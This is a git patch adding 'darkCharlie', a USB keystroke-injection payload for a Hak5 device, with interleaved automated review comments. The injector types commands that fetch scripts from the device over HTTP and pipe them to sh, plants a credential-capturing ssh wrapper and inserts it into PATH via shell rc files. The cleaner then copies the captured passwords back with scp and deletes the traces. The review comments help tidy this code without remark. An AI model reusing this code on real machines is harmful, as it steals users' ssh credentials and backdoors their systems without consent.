From 77b1a4e1230dc6fe9bb3ee110b900258aeb2d6c3 Mon Sep 17 00:00:00 2001
From: Michael Weinstein
Date: Tue, 19 Sep 2017 23:47:21 -0700
Subject: [PATCH] Now with injection and cleaning
---
 .../darkCharlie/cleaner/payload.txt | 66 ++++++++++++++++
 .../{ssh.py => injector/darkCharlie.py} | 0
 .../darkCharlie/injector/payload.txt | 79 +++++++++++++++++++
 .../credentials/darkCharlie/injector/post.sh | 9 +++
 .../credentials/darkCharlie/injector/pre.sh | 11 +++
 5 files changed, 165 insertions(+)
 create mode 100644 payloads/library/credentials/darkCharlie/cleaner/payload.txt
 rename payloads/library/credentials/darkCharlie/{ssh.py => injector/darkCharlie.py} (100%)
 create mode 100644 payloads/library/credentials/darkCharlie/injector/payload.txt
 create mode 100644 payloads/library/credentials/darkCharlie/injector/post.sh
 create mode 100644 payloads/library/credentials/darkCharlie/injector/pre.sh
diff --git a/payloads/library/credentials/darkCharlie/cleaner/payload.txt b/payloads/library/credentials/darkCharlie/cleaner/payload.txt
new file mode 100644
index 00000000..db71f259
--- /dev/null
+++ b/payloads/library/credentials/darkCharlie/cleaner/payload.txt
@@ -0,0 +1,66 @@
+#!/bin/bash
+
+# Title: darkCharlie{Cleaner}
+# Author: Michael Weinstein
+# Target: Mac/Linux
+# Version: 0.1
+#
+# Get the ssh creds from our loot collection.
+# And clean up after
+#
+# White | Ready
+# Blue blinking | Attacking
+# Green | Finished
+
+LED SETUP
+
+#setup the attack on macos (if false, attack is for Linux)
+mac=false
+
+if [ "$mac" = true ]
+then
+ ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
+else
+ ATTACKMODE ECM_ETHERNET HID
+fi
+
+DUCKY_LANG us
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+LOOT=/root/udisk/loot/darkCharlie
+mkdir -p $LOOT
+
+LED ATTACK
+
+if [ "$mac" = true ]
+then
+ RUN OSX terminal
+else
+ RUN UNITY xterm
+fi
+QUACK DELAY 2000
+
+QUACK STRING scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \~/.config/ssh/ssh.conf root@$HOST_IP:$LOOT/\$USER.sudo.passwd #nice hiding of known host info
+QUACK DELAY 200
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING hak5bunny
+QUACK DELAY 200
+QUACK ENTER
+QUACK DELAY 500
+if [ "$mac" = true ]
+then
+ QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile
+else
+ QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bashrc
+fi
+QUACK ENTER
+QUACK DELAY 200
+QUACK STRING exit
+QUACK DELAY 200
+QUACK ENTER
+LED SUCCESS
+#See you, space cowboy...
\ No newline at end of file
diff --git a/payloads/library/credentials/darkCharlie/ssh.py b/payloads/library/credentials/darkCharlie/injector/darkCharlie.py
similarity index 100%
rename from payloads/library/credentials/darkCharlie/ssh.py
rename to payloads/library/credentials/darkCharlie/injector/darkCharlie.py
diff --git a/payloads/library/credentials/darkCharlie/injector/payload.txt b/payloads/library/credentials/darkCharlie/injector/payload.txt
new file mode 100644
index 00000000..a59c6d07
--- /dev/null
+++ b/payloads/library/credentials/darkCharlie/injector/payload.txt
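Review bot: `cd /root/udisk/payloads/$SWITCH_POSITION/` in the cleaner is unchecked and unquoted, and nothing after it depends on the working directory — `$LOOT` and the scp target on the following lines are absolute paths — so a failed `cd` is silently ignored. Either drop the line or make the failure visible with `cd "/root/udisk/payloads/$SWITCH_POSITION/" || exit 1`, and quote the expansion two lines down, `mkdir -p -- "$LOOT"`. The same unquoted, unchecked `cd` line appears in injector/payload.txt in this commit.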
@@ -0,0 +1,79 @@
+#!/bin/bash
+
+# Title: darkCharlie
+# Author: Michael Weinstein
+# Target: Mac/Linux
+# Version: 0.1
+#
+# Create a wrapper for ssh sessions that
+# will live inside ~/.config/ssh and be added
+# tn the $PATH.
+#
+# This payload was inspired greatly by SudoBackdoor
+# and much of the code here was derived (or copied
+# wholesale) from that with great thanks to oXis.
+#
+# White | Ready
+# Amber blinking | Waiting for server
+# Blue blinking | Attacking
+# Green | Finished
+
+LED SETUP
+
+#setup the attack on macos (if false, attack is for Linux)
+mac=false
+
+if [ "$mac" = true ]
+then
+ ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
+else
+ ATTACKMODE ECM_ETHERNET HID
+fi
+
+DUCKY_LANG us
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+
+# starting server
+LED SPECIAL
+
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
+
+# wait until port is listening (credit audibleblink)
+while ! nc -z localhost 80; do sleep 0.2; done
+# that was brilliant!
+
+LED ATTACK
+
+if [ "$mac" = true ]
+then
+ RUN OSX terminal
+else
+ RUN UNITY xterm
+fi
+QUACK DELAY 2000
+
+if [ "$mac" = true ]
+then
+ QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh
+ QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh
+ QUACK STRING curl "http://$HOST_IP/post.sh" \| sh
+ QUACK STRING ~/.config/ssh/ssh --initializeScript
+else
+ QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT
+ QUACK STRING wget -O - "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh #Will test this on a mac when I finish up
+ QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh
+ QUACK STRING ~/.config/ssh/ssh --initializeScript
+fi
+
+QUACK DELAY 200
+QUACK ENTER
+QUACK DELAY 200
+QUACK STRING exit
+QUACK DELAY 200
+QUACK ENTER
+LED SUCCESS #The Dungeons and Dragons tattoo hath rolled a 20
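Review bot: The header comment of injector/payload.txt has a typo, `# tn the $PATH.` should read `# in the $PATH.`, and two inline comments mislead the reader: `#Will test this on a mac when I finish up` sits on the `wget` line of the Linux branch rather than in the `curl` branch it refers to, and `iptables -A OUTPUT -p udp --dport 53 -j DROP` carries no comment at all explaining why the device's own outbound DNS is dropped before the server starts (presumably so the HTTP server does not stall on lookups — confirm and say so on that line). `python -m SimpleHTTPServer 80 &` is also started without capturing `$!`, and nothing in the hunk stops it or removes the appended iptables rule before `LED SUCCESS`, so both appear to outlive the run on the device and the rule is duplicated on every run; either a comment stating that this is intentional or a matching `kill`/`iptables -D` before `LED SUCCESS` would make the lifecycle explicit.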
diff --git a/payloads/library/credentials/darkCharlie/injector/post.sh b/payloads/library/credentials/darkCharlie/injector/post.sh
new file mode 100644
index 00000000..bff63547
--- /dev/null
+++ b/payloads/library/credentials/darkCharlie/injector/post.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+
+chmod u+x ~/.config/sudo/sudo
+if [ -f ~/.bash_profile ]
+then
+ echo "export PATH=~/.config/ssh:$PATH" >> ~/.bash_profile
+else
+ echo "export PATH=~/.config/ssh:$PATH" >> ~/.bashrc
+fi
\ No newline at end of file
diff --git a/payloads/library/credentials/darkCharlie/injector/pre.sh b/payloads/library/credentials/darkCharlie/injector/pre.sh
new file mode 100644
index 00000000..06431c18
--- /dev/null
+++ b/payloads/library/credentials/darkCharlie/injector/pre.sh
@@ -0,0 +1,11 @@
+#!/bin/bash
+
+if [ ! -d ~/.config/ssh ]
+then
+ mkdir -p ~/.config/ssh
+fi
+
+if [ -f ~/.config/ssh/ssh ]
+then
+ rm ~/.config/ssh/ssh
+fi
\ No newline at end of file
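Review bot: post.sh has no header comment saying what it is or how it is invoked, although nothing on the page runs it except injector/payload.txt, which fetches it over HTTP and pipes it to `sh` after pre.sh and after darkCharlie.py has been written. A two-line header after the shebang, `# post.sh: fetched and piped to sh by injector/payload.txt once the wrapper has been written;` / `# marks it executable and appends an export of PATH to ~/.bash_profile if present, else ~/.bashrc.`, would let a reader place the file without opening payload.txt. The same missing-header remark applies to pre.sh in this commit.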
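Review bot: Both guards in pre.sh are redundant with the commands they wrap: `mkdir -p` already succeeds when the directory exists and `rm -f` already succeeds when the file is absent, so the two `if`/`then`/`fi` blocks reduce to `mkdir -p ~/.config/ssh` and `rm -f ~/.config/ssh/ssh` with identical effect. The script also has no header comment; as with post.sh, a line such as `# pre.sh: fetched and piped to sh by injector/payload.txt; creates ~/.config/ssh and removes any previous ~/.config/ssh/ssh` after the shebang would document where it fits.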